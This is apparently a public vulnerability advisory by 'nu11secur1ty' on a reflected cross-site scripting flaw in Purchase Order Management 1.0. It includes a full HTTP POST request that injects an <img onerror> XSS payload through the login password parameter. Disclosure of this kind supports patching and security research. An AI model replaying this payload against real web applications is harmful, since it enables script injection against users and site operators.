Headline
Purchase Order Management 1.0 Cross Site Scripting
Purchase Order Management version 1.0 appears to suffer from a cross site scripting vulnerability due to printing errors with a malicious password payload.
## Title: Purchase Order Management-1.0 - XSS-Reflected - Information-gathering## Author: nu11secur1ty## Date: 03.06.2023## Vendor: https://www.sourcecodester.com/user/257130/activity## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `password` request parameter is copied into the HTMLdocument as plain text between tags. The payload uay4w<img src=aonerror=alert(1)>s4m6g was submitted in the password parameter. Thisinput was echoed unmodified in the application's response.STATUS: HIGH Vulnerability[+]Exploit:```POSTPOST /purchase_order/classes/Login.php?f=login HTTP/1.1Host: localhostAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178Safari/537.36Connection: closeCache-Control: max-age=0Cookie: PHPSESSID=83loqso6i0hee5lpfufibf68o5Origin: http://localhostX-Requested-With: XMLHttpRequestReferer: http://localhost/purchase_order/admin/login.phpContent-Type: application/x-www-form-urlencoded; charset=UTF-8Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="110", "Chromium";v="110"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 37username=gAjjuMUL&password=k8Z!h2w!V7uay4w%3cimg%20src%3da%20onerror%3dalert(1)%3es4m6g```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0/XSS-Reflected)## Proof and Exploit:[href](https://streamable.com/cgw8a4)## Time spend:00:15:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer athttps://packetstormsecurity.com/https://cve.mitre.org/index.html andhttps://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>